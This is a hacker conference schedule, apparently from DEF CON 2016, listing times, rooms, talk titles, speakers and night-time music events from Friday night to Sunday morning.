Paris - Napoleon's Piano Bar and Lounge - Music - DJ Sm0ke Spinning
Paris - Track 2 - Music - Miss Jackalope
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Friday - 23:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Ballys - Skyview 5 - cont...(23:00-01:59) - Hacker Karaoke
Paris - Napoleon's Piano Bar and Lounge - Music - Richard Cheese & Lounge Against the Machine
Paris - Track 2 - Music - Zebbler Encanti Experience
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Saturday - 00:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party - DJ Mass Effect - San Francisco
Paris - Track 2 - Music - Dirtyphonics
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Saturday - 01:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Paris - Track 2 - Music - YT Cracker
Paris - Track 2 - Music - Dualcore
ST - Skyview 3 - cont...(21:00-01:59) - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Saturday - 02:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Saturday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Saturday - 09:00
Return to Index - Locations Legend
ST - Skyview 3 - Saflok or Unsaflok, That is the Question - Cell Wizard
Saturday - 10:00
Return to Index - Locations Legend
BHV - Skyview 4 - WELCOME TO BHV! Day 2 - Staff
BHV - Skyview 4 - Total Recall: Implanting Passwords in Cognitive Memory - Tess Schrodinger
BHV - Skyview 4 - Hacking the Second Genetic Code using Information Theory - Travis Lawrence
BHV - Skyview 4 - WELCOME TO BHV! Day 2 - Staff
BHV - Skyview 4 - Total Recall: Implanting Passwords in Cognitive Memory - Tess Schrodinger
BHV - Skyview 4 - Hacking the Second Genetic Code using Information Theory - Travis Lawrence
CPV - Bronze 1 - Silicon Valley and DC talk about freedom, crypto, and the cybers - Alex Stamos - CSO at Facebook, Rep. Eric Swalwell (D-CA 15th), Rep. Will Hurd (R-TX 23rd)
CPV - Bronze 2 - Open House - Welcome
CPV - Bronze 2 - Oops, I Cracked My PANs - qu0rum
DC - DC 101 - Escaping The Sandbox By Not Breaking It - Marco Grassi & Qidan He
DC - Track 1 - How to overthrow a Government - Chris Rock
DC - Track 3 - Developing Managed Code Rootkits for the Java Runtime Environment - Benjamin Holland (daedared)
DC - Track 2 - I Fight For The Users, Episode I - Attacks Against Top Consumer Products - Zack Fasel & Erin Jacobs
DL - Table 1 - LAMMA (beta) - Ajit Hatti
DL - Table 2 - CuckooDroid 2.0 - Idan Revivo
DL - Table 3 - Disable Single Step Debug with Xmode Code - Ke Sun & Ya Ou
DL - Table 4 - minimega - David Fritz & John Floren
DL - Table 5 - Dirt Simple Comms v2 (DSC2) - Tyler Oderkirk & Scott Carlson
DL - Table 6 - HoneyPy and HoneyDB - Phillip Maddux
IOT - Bronze 4 - Hot Wheels: Hacking Electronic Wheelchairs - Stephen Chavez
ST - Skyview 3 - To Beat the Toaster, We Must Become the Toaster: How to Show A.I. Who's Boss in the Robot Apocalypse - Jen, Darren
WV - Skyview 2 - Ham Radio Exams
WS - LV BR 1 - Guaranteed Security (Session 1)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - To Catch An APT: YARA - Jay DiMartino
Saturday - 11:00
Return to Index - Locations Legend
BHV - Skyview 4 - Biohackers Die - Jeffrey Tibbetts
BHV - Skyview 4 - Microscopes are Stupid - Louis Auguste
BHV - Skyview 4 - Attacking EMR (Electronic Health Records) - Using HL7 and DICOM to Hack Critical Infrastructure - Michael Hudson
BHV - Skyview 4 - Implants - Amal Graafstra
BHV - Skyview 4 - Biohackers Die - Jeffrey Tibbetts
BHV - Skyview 4 - Microscopes are Stupid - Louis Auguste
CPV - Bronze 1 - SSL Visibility, Uncovered - Andrew Brandt - Director of Threat Research at Blue Coat Systems
CPV - Bronze 2 - JWTs in a flash! - Evan Johnson (ejcx_) - Security Systems Engineer at CloudFlare
CPV - Bronze 2 - The State of HTTPS: securing web traffic is not what it used to be - J0N J4RV1S
DC - DC 101 - Secure Penetration Testing Operations: Demonstrated Weaknesses in Learning Material and Tools - Wesley McGrew
DC - Track 1 - Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker - Evan Booth (Fort)
DC - Track 3 - Picking Bluetooth Low Energy Locks from a Quarter Mile Away - Anthony Rose & Ben Ramsey
DC - Track 2 - Light-Weight Protocol! Serious Equipment! Critical Implications! - Lucas Lundgren & Neal Hindocha
DL - Table 1 - cont...(10:00-11:50) - LAMMA (beta) - Ajit Hatti
DL - Table 2 - cont...(10:00-11:50) - CuckooDroid 2.0 - Idan Revivo
DL - Table 3 - cont...(10:00-11:50) - Disable Single Step Debug with Xmode Code - Ke Sun & Ya Ou
DL - Table 4 - cont...(10:00-11:50) - minimega - David Fritz & John Floren
DL - Table 5 - cont...(10:00-11:50) - Dirt Simple Comms v2 (DSC2) - Tyler Oderkirk & Scott Carlson
DL - Table 6 - cont...(10:00-11:50) - HoneyPy and HoneyDB - Phillip Maddux
ST - Skyview 3 - God is a Human II - Artificial Intelligence and the Nature of Reality - Cassiopiea
WV - Skyview 1 - Evil ESP - Eric Escobar and Matt Trimble
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Guaranteed Security (Session 1)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(10:00-14:00) - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - cont...(10:00-14:00) - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - cont...(10:00-14:00) - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - cont...(10:00-14:00) - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - cont...(10:00-14:00) - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - cont...(10:00-14:00) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - How to Find 1,352 WordPress XSS Plugin Vulnerabilities in 1 Hour (not really) - Larry Cashdollar
Saturday - 12:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - The New White Hat Hacking: Computational Biology for the Good of Mankind - Rock Stevens and Candice Schumann
BHV - Skyview 4 - Reverse engineering biological research equipment for fun and open science - Charles Fracchia and Joel Dapello
CPV - Bronze 1 - Code breaking - Catching a cheat - Nezer Zaidenberg (scipio)
CPV - Bronze 2 - Overview and evolution of password-based authentication schemes - Ignat Korchagin
CPV - Bronze 2 - Open House - Key Signing Party & Lightning Talks
DC - DC 101 - Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5 - Luke Young
DC - Track 1 - Bypassing Captive Portals and Limited Networks - Grant Bugher
DC - Track 1 - Retweet to win: How 50 lines of Python made me the luckiest guy on Twitter - Hunter Scott
DC - Track 3 - CANSPY: A Framework for Auditing CAN Devices - Jonathan-Christofer Demay & Arnaud Lebrun
DC - Track 2 - pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon
DC - Track 2 - Stargate: Pivoting Through VNC To Own Internal Networks - Yonathan Klijnsma & Dan Tentler
DL - Table 1 - Android-InsecureBank - Dinesh Shetty
DL - Table 2 - DataSploit - Shubham Mittal
DL - Table 3 - Boscloner - All in One RFID Cloning Toolkit - Phillip Bosco
DL - Table 4 - Automated Penetration Tooklit (APT2) - Adam Compton
DL - Table 5 - DEF CON Wireless Collection Service (DCWCS) - darkmatter
DL - Table 6 - Emo-Tool/OldYeller/Ransomware-Simulator - Weston Hecker
HHV - Contest Area - An Introduction To Pulling Software From Flash via I2C, SPI and JTAG - Matt DuHarte
IOT - Bronze 4 - How the Smart-City becomes Stupid - Denis Makrushin, Vladimir Daschenko, Kaspersky Lab
ST - Skyview 3 - Art of Espionage (v.303) - Pyr0, Lizzie Borden
WV - Skyview 1 - Slaying Rogue Access Points with Python and Cheap Hardware - Gabriel Ryan
WV - Skyview 1 - Insteon, Inste-off, Inste-open? - Caleb Mays and Ben Ramsey
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Guaranteed Security (Session 1)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(10:00-14:00) - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - cont...(10:00-14:00) - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - cont...(10:00-14:00) - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - cont...(10:00-14:00) - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - cont...(10:00-14:00) - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - cont...(10:00-14:00) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - Music - DJ - tense future
WOS - Skyview 6 - HTTP/2 & QUIC: Teaching Good Protocols To Do Bad Things - Catherine (Kate) Pearce, Carl Vincent
Saturday - 13:00
Return to Index - Locations Legend
BHV - Skyview 4 - DIYBioweapons and Regulation - Meow Ludo Meow Meow
BHV - Skyview 4 - IoT of Dongs - RenderMan
BHV - Skyview 4 - Ethical Challenges & Responsibilities of Biohackers and Artists - John Sundman
BHV - Skyview 4 - DIYBioweapons and Regulation - Meow Ludo Meow Meow
BHV - Skyview 4 - IoT of Dongs - RenderMan
CPV - Bronze 2 - cont...(12:30-13:30) - Open House - Key Signing Party & Lightning Talks
CPV - Bronze 2 - Breaking Bad Crypto: BB'06 [WORKSHOP] - Filippo Valsorda
DC - DC 101 - NG9-1-1: The Next Generation of Emergency Ph0nage - CINCVolFLT & AK3R303
DC - Track 1 - Six Degrees of Domain Admin ... - Andy Robbins, Rohan Vazarkar, Will Schroeder
DC - Track 3 - Cunning with CNG: Soliciting Secrets from Schannel - Jake Kambic
DC - Track 2 - MouseJack: Injecting Keystrokes into Wireless Mice - Marc Newlin
DL - Table 1 - cont...(12:00-13:50) - Android-InsecureBank - Dinesh Shetty
DL - Table 2 - cont...(12:00-13:50) - DataSploit - Shubham Mittal
DL - Table 3 - cont...(12:00-13:50) - Boscloner - All in One RFID Cloning Toolkit - Phillip Bosco
DL - Table 4 - cont...(12:00-13:50) - Automated Penetration Tooklit (APT2) - Adam Compton
DL - Table 5 - cont...(12:00-13:50) - DEF CON Wireless Collection Service (DCWCS) - darkmatter
DL - Table 6 - cont...(12:00-13:50) - Emo-Tool/OldYeller/Ransomware-Simulator - Weston Hecker
IOT - Bronze 1 - SNMP and IoT Devices: Let me Manage that for you Bro! - Bertin Bervis
ST - Skyview 3 - Accessibility: A Creative Solution to Living Without Sight - Shaf Patel
Venders Area - No Starch Press booth - Nick Cano, Game Hacking - book signing
WV - Skyview 1 - Drone Hijacking and other IoT hacking with GNU Radio and XTRX SDR - Arthur Garipov
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Guaranteed Security (Session 1)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(10:00-14:00) - Cyber Deception: Hunting advanced attacks with MazeRunner - Dean Sysman
WS - LV BR 3 - cont...(10:00-14:00) - Brainwashing Embedded Systems - Craig Young
WS - LV BR 4 - cont...(10:00-14:00) - Taking a bite out of Apple - John Poulin
WS - LV BR 5 - cont...(10:00-14:00) - Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation - Madhu Akula & Riyaz Walikar
WS - LV BR 6 - cont...(10:00-14:00) - Embedded system design: from electronics to microkernel development - Rodrigo Maximiano Antunes de Almeida
WS - LV BR 7 - cont...(10:00-14:00) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick
WOS - Skyview 6 - Music - DJ - phreakocious
WOS - Skyview 6 - Now You See Me, Now You Don't - Joey Muniz and Aamir Lakhani
Saturday - 14:00
Return to Index - Locations Legend
BHV - Skyview 4 - Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode - Awesome Folks from Various BioHacking Podcasts
BHV - Skyview 4 - Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode - Awesome Folks from Various BioHacking Podcasts
CPV - Bronze 2 - cont...(13:30-15:00) - Breaking Bad Crypto: BB'06 [WORKSHOP] - Filippo Valsorda
DC - DC 101 - SITCH - Inexpensive, Coordinated GSM Anomaly Detection - ashmastaflash
DC - Track 1 - Weaponizing Data Science for Social Engineering: Automated E2E spear phishing on Twitter - Delta Zero & KingPhish3r
DC - Track 3 - Hacker-Machine Interface - State of the Union for SCADA HMI Vulnerabilities - Brian Gorenc & Fritz Sands
DC - Track 2 - Universal Serial aBUSe: Remote physical access attacks - Rogan Dawes & Dominic White
DL - Table 1 - Cloakify Exfiltration Toolset - TryCatchHCF
DL - Table 2 - DNS Analyse - John Heise
DL - Table 3 - PKI for the People - Ze'ev Glozman
DL - Table 4 - CrackMapExec - Marcello Salvati
DL - Table 5 - VirusTotalego - Christian Heinrich & Karl Hiramoto
DL - Table 6 - WebSec: a cross platform large scale vulnerability scanner - Dragos Boia
ST - Skyview 3 - Practical Penetration Testing of Embedded Devices - James Edge
Venders Area - No Starch Press booth - Jon Erickson, Hacking, 2nd Edition - book signing
WV - Skyview 1 - It's Just Software, Right? - Abraxas3d and Skunkworks
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - Guaranteed Security (Session 2)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - %27
WOS - Skyview 6 - Attacks on Enterprise Social Media - Mike Raggo
Saturday - 15:00
Return to Index - Locations Legend
BHV - Skyview 4 - Biotechnology Needs a Security Patch...Badly - Ed You
BHV - Skyview 4 - Standardizing the Secure Deployment of Medical Devices - Chris Frenz
BHV - Skyview 4 - 0day for the Soul - Tarah
BHV - Skyview 4 - The Bioethics of BioHacking - Christian Dameff
BHV - Skyview 4 - Biotechnology Needs a Security Patch...Badly - Ed You
BHV - Skyview 4 - Standardizing the Secure Deployment of Medical Devices - Chris Frenz
CPV - Bronze 2 - Ask the EFF: The Year in Digital Civil Liberties - Kurt Opsahl, Nate Cardozo, Andrew Crocker, Dr. Jeremy Giliula, Eva Galperin, Katitza Rodriguez - EFF
DC - DC 101 - Phishing without Failure and Frustration - Jay Beale
DC - Track 1 - Forcing a Targeted LTE Cellphone into Unsafe Network - Haoqi Shan & Wanqiao Zhang
DC - Track 3 - Exploiting and attacking seismological networks.. remotely - Bertin Bervis Bonilla & James Jara
DC - Track 2 - Playing Through the Pain? - The Impact of Secrets and Dark Knowledge - Richard Thieme
DL - Table 1 - cont...(14:00-15:50) - Cloakify Exfiltration Toolset - TryCatchHCF
DL - Table 2 - cont...(14:00-15:50) - DNS Analyse - John Heise
DL - Table 3 - cont...(14:00-15:50) - PKI for the People - Ze'ev Glozman
DL - Table 4 - cont...(14:00-15:50) - CrackMapExec - Marcello Salvati
DL - Table 5 - cont...(14:00-15:50) - VirusTotalego - Christian Heinrich & Karl Hiramoto
DL - Table 6 - cont...(14:00-15:50) - WebSec: a cross platform large scale vulnerability scanner - Dragos Boia
HHV - Contest Area - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 1 - Reversing and Exploiting Embedded Devices - Elvis Collado, Praetorian, Senior Security Researcher
IOT - Bronze 4 - Internet of Thieves (or DIY Persistence) - Joseph Needleman
ST - Skyview 3 - Tales from the Dongosphere: Lessons Learned Hosting Public Email for 4chan - Vincent Canfield
Venders Area - No Starch Press booth - The Smart Girls Guide to Privacy - book signing
WV - Skyview 1 - Blinded by the Light - tb68r and Tim Quester
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Guaranteed Security (Session 2)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(14:00-18:00) - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - cont...(14:00-18:00) - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - cont...(14:00-18:00) - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(14:00-18:00) - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - cont...(14:00-18:00) - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - cont...(14:00-18:00) - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - Moon in Gemini
WOS - Skyview 6 - Dynamic Population Discovery for Lateral Movement Detection (Using Machine Learning) - Rod Soto and Joseph Zadeh
Saturday - 16:00
Return to Index - Locations Legend
BHV - Skyview 4 - Reversing Your Own Source Code - Cosmo Mielke
BHV - Skyview 4 - The Era of Bio Big Data: Benefits and Challenges for Information Security, Health, the Economy, and National Security - Edward You
BHV - Skyview 4 - The Next Big Thing in Bioterrorism - Victoria Sutton
BHV - Skyview 4 - Reversing Your Own Source Code - Cosmo Mielke
CPV - Bronze 2 - Highlights from the Matasano Challenges [WORKSHOP] - Matt Cheung
DC - DC 101 - A Journey Through Exploit Mitigation Techniques in iOS - Max Bazaliy
DC - DC 101 - Esoteric Exfiltration - Willa Cassandra Riggins(abyssknight)
DC - Track 1 - "Cyber" Who Done It?! Attribution Analysis Through Arrest History - Jake Kouns
DC - Track 3 - Ask the EFF - Panel
DC - Track 3 - I've got 99 Problems, but LittleSnitch ain't one - Patrick Wardle
DC - Track 2 - DIY Nukeproofing: a new dig at "data-mining" - 3AlarmLampScooter
DC - Track 2 - All Your Solar Panels are belong to Me - Fred Bret-Mounet
DL - Table 1 - BurpSmartBuster - Patrick Mathieu
DL - Table 2 - OXML XXE - Willis Vandevanter
DL - Table 3 - Graylog - Lennart Koopman
DL - Table 4 - Visual Network and File Forensics using Rudra - Ankur Tyagi
DL - Table 5 - OWASP ZSC Shellcode - Johanna Curiel & Ali Ramzoo
DL - Table 6 - Deep look at back end systems of the future of credit card fraud. - Weston Hecker
HHV - Contest Area - cont...(15:00-16:59) - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 1 - Tranewreck - Jeff Kitson, Trustwave SpiderLabs, Security Researcher
SE - Palace 2-5 - Human Hacking: You ARE the weakest link. - Cyni Winegard & Bethany Ward
ST - Skyview 3 - Opps! I made a machine gun: The Progressive Lowering of the Barrier to Entry in Firearms Manufacturing - Gingerbread
WV - Skyview 1 - Multi-channel Wardriving Tools for IEEE 802.15.4 and Beyond - Tom Hayes
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Guaranteed Security (Session 2)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(14:00-18:00) - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - cont...(14:00-18:00) - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - cont...(14:00-18:00) - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(14:00-18:00) - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - cont...(14:00-18:00) - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - cont...(14:00-18:00) - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - TK
WOS - Skyview 6 - Fuzzing For Humans: Real Fuzzing in the Real World - Joshua Pereyda
Saturday - 17:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - The Brave New World of Bio-Entrepreneurship - Jun Axup
BHV - Skyview 4 - The collision of prosthetics, robotics and the human interface - Randall Alley
BHV - Skyview 4 - Intro to Brain Based Authentication - NeuroTechX
BHV - Skyview 4 - Make your own Brain device - NeuroTechX
BHV - Skyview 4 - The Brave New World of Bio-Entrepreneurship - Jun Axup
BHV - Skyview 4 - The collision of prosthetics, robotics and the human interface - Randall Alley
CPV - Bronze 2 - cont...(16:00-18:00) - Highlights from the Matasano Challenges [WORKSHOP] - Matt Cheung
DC - DC 101 - Sticky Keys To The Kingdom: Pre-auth RCE Is More Common Than You Think - Linuz & Medic
DC - DC 101 - Propaganda and you (and your devices)... - The Bob Ross Fan Club
DC - Track 1 - Drunk Hacker History
DC - Track 3 - Crypto State of the Law - Nate Cardozo
DC - Track 2 - Abusing Bleeding Edge Web Standards for AppSec Glory - Bryant Zadegan & Ryan Lester
DL - Table 1 - cont...(16:00-17:50) - BurpSmartBuster - Patrick Mathieu
DL - Table 2 - cont...(16:00-17:50) - OXML XXE - Willis Vandevanter
DL - Table 3 - cont...(16:00-17:50) - Graylog - Lennart Koopman
DL - Table 4 - cont...(16:00-17:50) - Visual Network and File Forensics using Rudra - Ankur Tyagi
DL - Table 5 - cont...(16:00-17:50) - OWASP ZSC Shellcode - Johanna Curiel & Ali Ramzoo
DL - Table 6 - cont...(16:00-17:50) - Deep look at back end systems of the future of credit card fraud. - Weston Hecker
IOT - Bronze 4 - Thermostat Ransomware and Workshop - Pen Test Partners
SE - Palace 2-5 - ….and bad mistakes I’ve made a few…. - Jayson Street
ST - Skyview 3 - The next John Moses Browning will use GitHub - Karl Kasarda, Iam McCollum
WV - Skyview 1 - Imagine a Beowulf cluster of Pineapples! - Darren Kitchen and Seb Kinne
WV - Skyview 2 - cont...(10:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Guaranteed Security (Session 2)- - Vivek Notani & Roberto Giacobazzi
WS - LV BR 2 - cont...(14:00-18:00) - Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach - Ajit Hatti
WS - LV BR 3 - cont...(14:00-18:00) - Ready? Your Network is Being Pwned NOW! - Robin Jackson & Ed Williams
WS - LV BR 4 - cont...(14:00-18:00) - Hands-on Cryptography with Python - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(14:00-18:00) - Fuzzing Android Devices - Anto Joseph
WS - LV BR 6 - cont...(14:00-18:00) - PCB Design Crash Course: A primer to designing your own hacking tools. - Seth Wahle
WS - LV BR 7 - cont...(14:00-18:00) - Physical Security for Computing Systems, a Look at Design, Attacks and Defenses - Steve Weingart
WOS - Skyview 6 - Music - DJ - yurk
WOS - Skyview 6 - Mining VirusTotal for Operational Data and Applying a Quality Control On It - Gita Ziabari
Saturday - 18:00
Return to Index - Locations Legend
BHV - Skyview 4 - The Rise of Digital Medicine: At-home digital clinical research - Andrea Coravos
BHV - Skyview 4 - Designer Babies - Christian and Erin
BHV - Skyview 4 - The Rise of Digital Medicine: At-home digital clinical research - Andrea Coravos
BHV - Skyview 4 - Designer Babies - Christian and Erin
CPV - Bronze 2 - Open House
DC - Track 1 - cont...(17:00-18:59) - Drunk Hacker History
IOT - Bronze 4 - cont...(17:00-18:30) - Thermostat Ransomware and Workshop - Pen Test Partners
SE - Palace 2-5 - SCAM CALL – Call Dropped - Mattias Borg
ST - Skyview 3 - Taking Down Skynet (By Subverting the Command and Control Channel) - Phax
WOS - Skyview 6 - Music - DJ - phreakocious
WOS - Skyview 6 - Fiddler on the Roof: A No-Nonsense Look at Fiddler and Its Usage - Morgan "Indrora" Gangwere
Saturday - 19:00
Return to Index - Locations Legend
SE - Palace 2-5 - How to Un-Work your job: Revolutions, Radicals and Engineering by Committee. - Steven Zani
Saturday - 20:00
Return to Index - Locations Legend
Ballys - Skyview 5 - Hacker Karaoke
DC - Track 1 - Hacker Jeopardy
Paris - Track 2 - Music - djdead
SE - Palace 2-5 - Advanced social engineering techniques and the rise of cyber scams industrial complex - Fadli Sidek
Saturday - 21:00
Return to Index - Locations Legend
Ballys - Skyview 5 - cont...(21:00-01:59) - Hacker Karaoke
DC - Track 1 - cont...(20:00-21:59) - Hacker Jeopardy
Paris - Track 2 - Music - DJ Callum McGowan
Saturday - 22:00
Return to Index - Locations Legend
Ballys - Blu Pool - IOActive FreakShow 2016
Ballys - Skyview 5 - cont...(22:00-01:59) - Hacker Karaoke
Paris - Track 2 - Music - CTRL/rsm
Saturday - 23:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Ballys - Skyview 5 - cont...(23:00-01:59) - Hacker Karaoke
Paris - Track 2 - Music - Information Society
ST - Skyview 3 - Music - 303 - Featured Performer Pictureplane with special guest Miss DJ Jackalope and special hard dance sets from DJ Ritual and DJ Slave1
Saturday - 01:00
Return to Index - Locations Legend
ST - Skyview 3 - cont...(01:00-01:59) - Music - 303 - Featured Performer Pictureplane with special guest Miss DJ Jackalope and special hard dance sets from DJ Ritual and DJ Slave1
Sunday - 00:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Paris - Track 2 - cont...(23:00-00:14) - Music - Information Society
Paris - Track 2 - Music - Berlin
ST - Skyview 3 - cont...(00:00-01:59) - Music - 303 - Featured Performer Pictureplane with special guest Miss DJ Jackalope and special hard dance sets from DJ Ritual and DJ Slave1
Sunday - 01:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Paris - Track 2 - cont...(00:15-01:29) - Music - Berlin
Paris - Track 2 - Music - DJ Manila Ice
Sunday - 02:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(22:00-02:59) - IOActive FreakShow 2016
Paris - Track 2 - cont...(01:30-02:30) - Music - DJ Manila Ice
Sunday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Sunday - 09:00
Return to Index - Locations Legend
ST - Skyview 3 - What's Lurking Inside MP3 Files That Can Hurt You? - Mike Raggo, Chet Hosmer
Sunday - 10:00
Return to Index - Locations Legend
BHV - Skyview 4 - CRISPR/Cas9: Newest Tools for Biohacking fun - Dr. Thomas P. Keenan
DC - DC 101 - How to get good seats in the security theater? Hacking boarding passes for fun & profit. - Przemek Jaroszewski
DC - Track 1 - How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire - Stephan Huber & Siegfried Rasthofer
DC - Track 3 - Examining the Internet's pollution - Karyn Benson
DC - Track 2 - Hacking Hotel Keys and Point of Sale systems ... - Weston Hecker
IOT - Bronze 4 - 0-day Hunting - TBA
ST - Skyview 3 - The other way to get a hairy hand; or, contracts for hackers - Brendan Oconnor
Sunday - 11:00
Return to Index - Locations Legend
BHV - Skyview 4 - WELCOME TO THE LAST DAY OF BHV! - Staff
BHV - Skyview 4 - The Future is Fake Identities - Paul Ashley
BHV - Skyview 4 - Might as well name it Parmigiana, American, Cheddar, and Swiss - Ken Belva
BHV - Skyview 4 - Hacking Sensory Perception - Scott Novich
BHV - Skyview 4 - Implants - Amal Graafstra
BHV - Skyview 4 - WELCOME TO THE LAST DAY OF BHV! - Staff
BHV - Skyview 4 - The Future is Fake Identities - Paul Ashley
BHV - Skyview 4 - Might as well name it Parmigiana, American, Cheddar, and Swiss - Ken Belva
CPV - Bronze 2 -
CPV - Bronze 2 - Managing digital codesigning identities in an engineering company - Evgeny Sidorov, Eldar Zaitov
DC - DC 101 - Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game - Joshua Drake & Steve Christey Coley
DC - Track 1 - Hiding Wookiees in HTTP - HTTP smuggling... - regilero
DC - Track 3 - Use Their Machines Against Them: Loading Code with a Copier - Mike
DC - Track 2 - Discovering and Triangulating Rogue Cell Towers - JusticeBeaver
IOT - Bronze 1 - IoT Defenses - Software, Hardware, Wireless and Cloud - Aaron Guzman, Principal Penetration Tester
IOT - Bronze 4 - cont...(10:00-11:59) - 0-day Hunting - TBA
ST - Skyview 3 - Front Door Nightmare - obiwan666
WOS - Skyview 6 - Music - DJ - kampf
